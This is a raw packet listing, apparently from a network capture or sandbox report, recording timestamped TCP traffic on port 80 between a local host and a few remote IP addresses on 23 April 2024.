Apr 23, 2024 09:43:11.587446928 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587460041 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587471962 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587483883 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.587486029 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587500095 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587507010 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587513924 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587519884 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587527037 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587533951 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587548018 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587562084 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587569952 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587575912 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587582111 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587588072 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587594986 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587600946 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587608099 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587613106 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587618113 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.587620020 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587626934 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587632895 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587640047 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587646961 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587652922 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587728024 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.587922096 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.791464090 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791500092 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791512966 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791527033 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791582108 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.791582108 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.791785002 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791805983 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791819096 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791835070 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791852951 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791862011 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.791866064 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791879892 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791893005 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791897058 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.791904926 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791918039 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791929960 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.791932106 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.791958094 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.791985035 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792000055 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792011976 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792015076 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792025089 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792037964 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792049885 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792053938 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792054892 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792085886 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792104959 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792105913 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792123079 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792135000 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792144060 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792148113 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792161942 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792174101 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792176962 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792186975 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792197943 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792200089 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792213917 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792226076 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792243958 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792246103 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792263985 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792277098 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792277098 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792277098 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792294979 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792306900 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792320013 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792323112 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792332888 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792345047 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792346001 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792356968 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792361021 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792370081 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792382002 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792395115 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792397022 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792402983 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792412043 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792416096 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792428970 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792432070 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792440891 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792455912 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792459965 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792474031 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792485952 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792499065 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792503119 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792511940 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792525053 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792526007 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792536974 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792550087 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792562008 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792562962 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792573929 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792586088 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792587042 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792599916 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792612076 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792613029 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792624950 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792624950 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792639017 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792650938 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792651892 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792665005 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792671919 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792680979 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792684078 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792697906 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792710066 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792716026 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792725086 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792737007 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792737961 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792749882 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792762041 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792762995 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792774916 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792793036 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792793989 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792805910 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792818069 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792819977 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792829990 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792831898 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792844057 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792855978 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.792879105 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792879105 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.792943954 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.995769978 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.995785952 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.995796919 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.995812893 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.995820045 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.995835066 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.995848894 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.995862007 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.995920897 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.995944023 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.995944023 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.995997906 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996011972 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996073961 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996088028 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996236086 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996249914 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996262074 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996270895 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.996273994 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996288061 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996299028 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996301889 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.996311903 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996326923 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996334076 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.996339083 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996351957 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996364117 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996376038 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996377945 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.996390104 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996397972 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.996397972 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.996732950 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.996845007 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996937990 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996951103 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996962070 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996975899 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.996989965 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997024059 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997128010 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997140884 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997150898 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997152090 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997164965 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997175932 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997188091 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997195005 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997195005 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997208118 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997220039 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997231960 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997239113 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997239113 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997243881 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997256994 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997263908 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997271061 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997282982 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997287035 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997296095 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997308016 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997313976 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997320890 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997332096 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997344017 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997345924 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997350931 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997363091 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997370005 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997370005 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997375011 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997386932 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997392893 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997405052 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997410059 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997419119 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997431993 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997442961 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997447968 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997457981 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997473001 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997486115 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997488022 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997488022 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997498035 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997510910 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997524023 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997526884 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997536898 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997549057 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997591019 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997603893 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997615099 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997616053 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997628927 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997641087 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997653961 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997656107 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997667074 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997669935 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997679949 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997692108 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997699022 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997699022 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997704029 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997715950 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997728109 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997730970 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997741938 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997755051 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997766972 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997770071 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997780085 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997792959 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997805119 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997807026 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997817039 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997829914 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997832060 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997832060 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997843027 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997855902 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997868061 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997870922 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997880936 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997894049 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997895002 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997905970 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997908115 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997932911 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.997950077 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997961998 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997982025 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.997996092 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998008966 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998023033 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.998024940 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998038054 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998039961 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.998051882 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998064041 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.998070955 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998084068 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998095989 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998104095 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.998107910 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998120070 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998127937 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.998132944 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998147011 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998152971 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.998162031 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998176098 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998178005 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.998183012 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998188972 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.998245955 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.998300076 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.998300076 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:12.475512981 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 23, 2024 09:43:12.711343050 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:12.943999052 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:12.944066048 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:12.944147110 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.160418987 CEST	49703	80	192.168.2.7	185.172.128.76
Apr 23, 2024 09:43:13.176647902 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177037954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177057981 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177074909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177092075 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177109957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177113056 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.177129984 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177160025 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.177165985 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177180052 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:13.177186966 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177206039 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177222967 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:13.177232027 CEST	49702	80	192.168.2.7	176.97.76.106
